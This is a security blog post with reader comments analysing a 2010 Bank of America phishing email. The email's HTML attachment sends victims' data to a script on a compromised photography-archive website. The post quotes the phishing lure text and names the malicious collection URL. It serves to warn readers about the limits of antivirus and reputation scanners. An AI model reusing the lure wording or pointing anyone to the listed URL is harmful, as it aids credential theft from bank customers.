Ned Scott apparently was a Hollywood still photographer in the mid part of the 20th century. TheNedScottArchive.com is an effort by his son, Norm Scott, to memorialize the black and white artistry of his dad. Unfortunately, however. thenedscottarchive.com is also a compromised website, which presumably unbeknownst to its owner is acting as a man-in-the-browser attack vehicle in a Bank of America phishing scam.
The phishing scam arrives via an email carrying an attachment named "Account Verification File .html" (extraneous space is part of the filename). The subject line of the email is "Irregular Card Activity" and the body of the email message reads in part:
We detected irregular activity on your BankOfAmerica Card on 08/25/2010.
For your protection, you must verify this activity before you can continue using your card.
Please download the file attached to this email and fill out the information to review your account.
We will review the activity on your account with you and upon verification, we will remove any restrictions placed on your account.
Your first reaction might be to scan the attachment with your antivirus software. But as seen in this VirusTotal report, none of the 42 scanners tested see anything remiss with the file attachment.
Antivirus software is reactive protection, so it's no surprise that all 42 of the scanners tested failed to detect this threat. Would there be better luck with one of the online analysis tools that don't rely on signatures? Unfortunately not - both JSunpack and Wepawet also saw the file as benign.
On the plus side, Wepawet did unpack the source code enabling a close manual inspection of the contents. The manual inspection revealed the submitted data was being processed not by Bank of America, but rather by http://thenedscottarchive.com/includes/js/verificare.php. Sadly, submitting that obviously malicious file to Wepawet also resulted in a "benign" declaration. Perhaps worse, a URL check of http://thenedscottarchive.com/includes/js/verificare.php reveals that 7 out of 7 anti-phishing tools proclaim it a "Clean site".
So what's the lesson here?
Compromised websites are a clever and very effective way for attackers to hide their malcode. A vote of "Clean site" is all but meaningless in today's hostile Web environment. Reputation scanners don't base their decision on the code contained on the site, nor on the present condition of the site, but rather on what's known about the website from the past.
Secondly, when it does come to analyzing malcode via an automated analysis tool, take any report of "benign" with a grain of salt. Instead, read through the code line by line so you can make the proper determination yourself.
And third, just because 42 antivirus scanners don't detect malware in a file, it doesn't mean the file is safe.
For those not skilled in reading source code, just know that your bank will not send you an unsolicited email attachment. If you do receive a notice from your bank via email, do not open any attachments or click any links in that email. Instead, visit your bank in person, or call them on the phone using the number on the back of your bank card, or log in to your online account by typing the URL into the browser directly and check for any valid bank messages that appear in your account screens.
Thank You ever so much for the valuable information contained within this article. I’ll be alerting others. You have been previously helpful in many ways. With much thanks.
But surely nobody would ever open an email thus addressed. Obviously I cannot be certain on how the banking system works in the US, or even most of the UK banks. What I do know is that each and every time I go to log on to my own bank I am informed that they would never ever send out such an email. They also include the same message on a regular basis in my account.
I often receive emails of the nature mentioned above. Sometimes they come from banks I have never even heard of, but mostly from the big five UK banks, never from my own I am delighted to say. I have only ever having banked with one of them anyway, and that was way back in the days before home computers, let alone the Internet. So I never even open the email, let alone any attachment. I just dump them in the bin.
Should there ever be a problem with my bank account, usually if I have keyed in the wrong numbers three times, I have to contact the bank myself to sort it out. Actually it would be incredibly difficult for them to contact me by email as unless they are mind readers they don’t have my email address.
This is a great example to use for teaching the “unwashed masses” about the limits of existing anti-malware
Roz:
Yes people will open it. Many people will open it, that is why it is a phishing attack. I recently read about a “nice little old lady” who sent over 1/2 million dollars to phishers. Much of it was sent even after it was clearly explained to her that she was being scammed. There are LOTS of people on the internet, it only takes an extremely tiny percentage of them to be gullible for a scam to be profitable.
no software will just conveniently and automatically spot pfishing schemes if cleverly concealed. I tried the URL, just for fun, on my Firefox bad site locator. I use Ubuntu. It seems that Google, the reference, tested the site and found no technical reason to call it bad. Interestingly, I tried a couple of Linux user forums, and it popped right up. People using those forums also used their heads, they contacted the bank first and found the message to be a phony.